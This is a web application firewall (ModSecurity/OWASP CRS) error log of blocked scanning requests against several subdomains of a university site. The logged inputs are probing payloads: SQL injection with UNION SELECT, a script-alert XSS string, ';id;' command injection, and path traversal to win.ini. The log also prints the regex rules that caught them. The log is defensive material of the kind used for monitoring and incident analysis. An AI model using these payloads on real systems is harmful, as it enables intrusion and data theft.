[Tue Aug 29 11:40:44.558995 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAXbcOMAAAAL"]
[Tue Aug 29 11:40:44.579773 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAcVJQcAAAAB"]
[Tue Aug 29 11:40:44.589655 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAcPizkAAAAa"]
[Tue Aug 29 11:40:44.599634 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAaHMf4AAAAE"]
[Tue Aug 29 11:40:44.600702 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAcVJQgAAAAB"]
[Tue Aug 29 11:40:44.605431 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAYf-JYAAAAD"]
[Tue Aug 29 11:40:44.620221 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12zMCo-f0AAAaHMf8AAAAE"]
[Tue Aug 29 11:40:44.628326 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAYf-JcAAAAD"]
[Tue Aug 29 11:40:44.631540 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAcPizsAAAAa"]
[Tue Aug 29 11:40:44.661483 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAcVJQsAAAAB"]
[Tue Aug 29 11:40:45.374327 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zcCo-f0AAAaHMgEAAAAE"]
[Tue Aug 29 11:40:46.419780 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAaHMgQAAAAE"]
[Tue Aug 29 11:40:46.433212 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAcVJQ8AAAAB"]
[Tue Aug 29 11:40:46.439992 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAcYU48AAAAp"]
[Tue Aug 29 11:40:46.453418 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAcVJRAAAAAB"]
[Tue Aug 29 11:40:46.481412 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAaHMgcAAAAE"]
[Tue Aug 29 11:40:48.372697 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO120MCo-f0AAAcqJEkAAAAG"]
[Tue Aug 29 11:40:50.361551 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAcPi0MAAAAa"]
[Tue Aug 29 11:40:50.364950 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAYf-JwAAAAD"]
[Tue Aug 29 11:40:50.379989 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAcbSAEAAAAv"]
[Tue Aug 29 11:40:50.382810 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAQSWncAAAA0"]
[Tue Aug 29 11:40:50.387580 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO120sCo-f0AAAcqJEsAAAAG"]
[Tue Aug 29 11:40:50.392321 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAYf-J0AAAAD"]
[Tue Aug 29 11:40:50.408465 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAQSWngAAAA0"]
[Tue Aug 29 11:40:50.408704 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAYMWSsAAAAR"]
[Tue Aug 29 11:40:50.412315 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAaZ9j8AAAAo"]
[Tue Aug 29 11:40:50.413081 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAYf-J4AAAAD"]
[Tue Aug 29 11:40:50.427936 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAQSWnkAAAA0"]
